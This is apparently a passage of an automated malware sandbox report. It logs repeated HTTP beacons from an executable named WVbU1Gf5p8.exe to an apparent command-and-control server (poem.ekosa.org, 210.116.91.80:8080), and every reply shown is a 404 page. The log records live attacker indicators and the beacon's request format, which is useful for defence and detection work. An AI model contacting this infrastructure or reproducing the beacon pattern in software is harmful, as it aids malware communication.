      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      35192.168.2.449801210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:17.660536051 CET469OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:17.917649031 CET470INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:17 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      36192.168.2.449802210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:18.294675112 CET470OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:18.562208891 CET471INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:18 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      37192.168.2.449803210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:18.824387074 CET472OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:19.081305027 CET476INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:18 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      38192.168.2.449805210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:19.348949909 CET479OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:19.612787008 CET480INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:19 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      39192.168.2.449806210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:20.001885891 CET480OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:20.271342993 CET481INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:19 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      4192.168.2.449762210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:58.937810898 CET107OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:54:59.198338032 CET108INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:59 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      40192.168.2.449807210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:20.544534922 CET482OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:20.805959940 CET482INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:20 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      41192.168.2.449808210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:21.083111048 CET483OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:21.354104996 CET483INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:20 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      42192.168.2.449809210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:21.728523016 CET484OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:21.991290092 CET485INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:21 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      43192.168.2.449810210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:22.255980968 CET485OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:22.516060114 CET486INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:21 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      44192.168.2.449811210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:22.804016113 CET487OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:23.083775043 CET487INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:22 GMT
      Connection: close
      Content-Length: 315
